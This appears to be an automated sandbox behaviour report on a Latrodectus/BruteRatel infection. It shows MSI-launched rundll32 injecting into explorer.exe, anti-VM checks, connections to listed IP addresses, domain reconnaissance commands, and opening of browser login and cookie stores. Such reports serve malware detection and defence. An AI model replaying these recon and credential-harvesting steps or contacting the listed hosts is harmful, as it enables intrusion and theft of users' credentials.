Source: C:\Windows\explorer.exe	Code function: 9_2_0137A8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,	9_2_0137A8E0
Source: C:\Windows\explorer.exe	Code function: 9_2_01372B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	9_2_01372B28
Source: C:\Windows\explorer.exe	Code function: 9_2_013804C0 FindFirstFileW,	9_2_013804C0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D16F4 FindFirstFileW,FindNextFileW,LoadLibraryW,	9_2_0B8D16F4
Source: C:\Windows\explorer.exe	Code function: 9_2_0B8D6604 lstrcpyA,lstrlenA,lstrcatA,lstrcatA,FindFirstFileA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,StrStrIA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	9_2_0B8D6604

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_00007FFDFA8A9A80 GetSystemInfo,

5_2_00007FFDFA8A9A80

Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000009.00000000.2053703533.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000009.00000000.2053703533.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000009.00000000.2052116683.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}'
Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000009.00000000.2050728956.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000009.00000003.3618520835.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000009.00000000.2053703533.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: rundll32.exe, 00000005.00000002.4125113963.0000023CD8B0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125203904.0000023CD8BA9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BA9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4131028570.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4131028570.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000009.00000000.2052116683.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3618520835.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3462488864.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3114928879.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000009.00000003.2944396374.0000000008B70000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: explorer.exe, 00000009.00000000.2050728956.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000009.00000002.4131028570.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000009.00000000.2050728956.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\explorer.exe

Code function: 9_2_0B8D76DC rdtsc

9_2_0B8D76DC

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_0000023CDA48CCE0 LdrGetProcedureAddress,

5_2_0000023CDA48CCE0

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C1D0A5 IsDebuggerPresent,OutputDebugStringW,

3_2_00C1D0A5

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_00007FFDFA968990 GetLastError,IsDebuggerPresent,OutputDebugStringW,

5_2_00007FFDFA968990

Source: C:\Windows\explorer.exe

Code function: 9_2_0B8D4948 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,OpenProcess,StrStrIA,StrStrIA,StrStrIA,TerminateProcess,CloseHandle,Process32Next,CloseHandle,

9_2_0B8D4948

Source: C:\Windows\explorer.exe

Code function: 9_2_0B8D89E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

9_2_0B8D89E4

Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C42DCC mov ecx, dword ptr fs:[00000030h]		3_2_00C42DCC
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C4AD78 mov eax, dword ptr fs:[00000030h]		3_2_00C4AD78

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C12310 GetProcessHeap,

3_2_00C12310

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Windows\Installer\MSI48D4.tmp "C:\Windows\Installer\MSI48D4.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\wait.dll, Jump

Jump to behavior

Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C333A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00C333A8
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C3353F SetUnhandledExceptionFilter,	3_2_00C3353F
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C32968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00C32968
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C36E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00C36E1B
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA97CFD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00007FFDFA97CFD8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00007FFDFA946264 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FFDFA946264
Source: C:\Windows\explorer.exe	Code function: 9_2_0B961DA0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_0B961DA0
Source: C:\Windows\explorer.exe	Code function: 9_2_0B9753A8 SetUnhandledExceptionFilter,	9_2_0B9753A8

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 104.21.68.89 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.16.251 443	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Network Connect: 103.57.249.207 6542	Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\System32\rundll32.exe

Memory allocated: C:\Windows\explorer.exe base: 1370000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject threads in other processes

Source: C:\Windows\System32\rundll32.exe

Code function: 5_3_00007DF4877C0100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,

5_3_00007DF4877C0100

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\rundll32.exe

Thread created: C:\Windows\explorer.exe EIP: 1370000

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\rundll32.exe

Memory written: C:\Windows\explorer.exe base: 1370000 value starts with: 4D5A

Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\rundll32.exe

Memory written: PID: 2580 base: 1370000 value: 4D

Jump to behavior

Sets debug register (to hijack the execution of another thread)

Source: C:\Windows\System32\rundll32.exe

Thread register set: 7664 1

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\rundll32.exe

Memory written: C:\Windows\explorer.exe base: 1370000

Jump to behavior

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C152F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,

3_2_00C152F0

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_00007FFDFA8A9AC0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,

5_2_00007FFDFA8A9AC0

Source: explorer.exe, 00000009.00000002.4131028570.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4125727069.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2051955138.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000009.00000002.4125727069.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2050968000.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000009.00000002.4125057147.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2050728956.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman$
Source: explorer.exe, 00000009.00000002.4125727069.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2050968000.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000009.00000002.4125727069.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.2050968000.00000000018A1000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C335A9 cpuid

3_2_00C335A9

Source: C:\Windows\Installer\MSI48D4.tmp	Code function: EnumSystemLocalesW,	3_2_00C4E0C6
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: EnumSystemLocalesW,	3_2_00C4E1AC
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: EnumSystemLocalesW,	3_2_00C4E111
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: EnumSystemLocalesW,	3_2_00C47132
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_00C4E237
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: GetLocaleInfoEx,	3_2_00C323F8
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: GetLocaleInfoW,	3_2_00C4E48A
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_00C4E5B3
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: GetLocaleInfoW,	3_2_00C476AF
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: GetLocaleInfoW,	3_2_00C4E6B9
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_00C4E788
Source: C:\Windows\System32\rundll32.exe	Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,wcschr,wcschr,GetLocaleInfoW,	5_2_00007FFDFA99DB78
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	5_2_00007FFDFA99DEC8
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	5_2_00007FFDFA99DF98
Source: C:\Windows\System32\rundll32.exe	Code function: GetLocaleInfoW,	5_2_00007FFDFA993D30
Source: C:\Windows\System32\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	5_2_00007FFDFA99E3D8
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,	5_2_00007FFDFA9936A8
Source: C:\Windows\System32\rundll32.exe	Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	5_2_00007FFDFA99E5B4

Source: C:\Windows\System32\rundll32.exe

5_2_00007FFDFA8ADCBC

Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C337D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

3_2_00C337D5

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_0000023CDA4A4D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,

5_2_0000023CDA4A4D00

Source: C:\Windows\Installer\MSI48D4.tmp

Code function: 3_2_00C47B1F GetTimeZoneInformation,

3_2_00C47B1F

Source: C:\Windows\explorer.exe

Code function: 9_2_0137891C RtlGetVersion,GetVersionExW,

9_2_0137891C

Source: C:\Windows\System32\nltest.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: WMIC.exe, 00000022.00000003.3205750718.00000168E2AA7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3206940519.00000168E2E0B000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3206909823.00000168E2AB4000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3203140018.00000168E3181000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3204986672.00000168E2AA7000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3204882904.00000168E2AB1000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3202974361.00000168E2AA7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pathToSignedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 00000022.00000002.3206940519.00000168E2E0B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gnedReportingExe=%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 00000022.00000002.3205850824.0000002202B07000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ndows Defender\MsMpeng.exe
Source: WMIC.exe, 00000022.00000003.3202974361.00000168E2A63000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3203050115.00000168E2A89000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3206837378.00000168E2A9B000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3204986672.00000168E2A9A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: WMIC.exe, 00000022.00000002.3206940519.00000168E2E0B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: indows Defender\MsMpeng.exe
Source: WMIC.exe, 00000022.00000003.3203718696.00000168E3160000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3206787476.00000168E2A8B000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3202974361.00000168E2A63000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3203050115.00000168E2A89000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000003.3203737549.00000168E3161000.00000004.00000020.00020000.00000000.sdmp, WMIC.exe, 00000022.00000002.3206703908.00000168E2A6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected BruteRatel

Source: Yara match	File source: 00000005.00000002.4125925258.0000023CDAA1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2049513486.0000023CDAA4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 7664, type: MEMORYSTR

Yara detected Latrodectus

Source: Yara match	File source: 00000009.00000002.4132374823.0000000009F9A000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Contains functionality to steal Internet Explorer form passwords

Source: C:\Windows\explorer.exe

Code function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2

9_2_0B8D8848

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Suhba\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Kometa\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Torch\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Xpom\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Safer Technologies\Secure Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Go!\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\RockMelt\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Nichrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\7Star\7Star\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Superbird\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Sputnik\Sputnik\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Amigo\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Rafotech\Mustang\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Bromium\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\QIP Surf\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Elements Browser\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\uCozMedia\Uran\User Data\Default\Network\Cookies	Jump to behavior

Remote Access Functionality

Yara detected BruteRatel

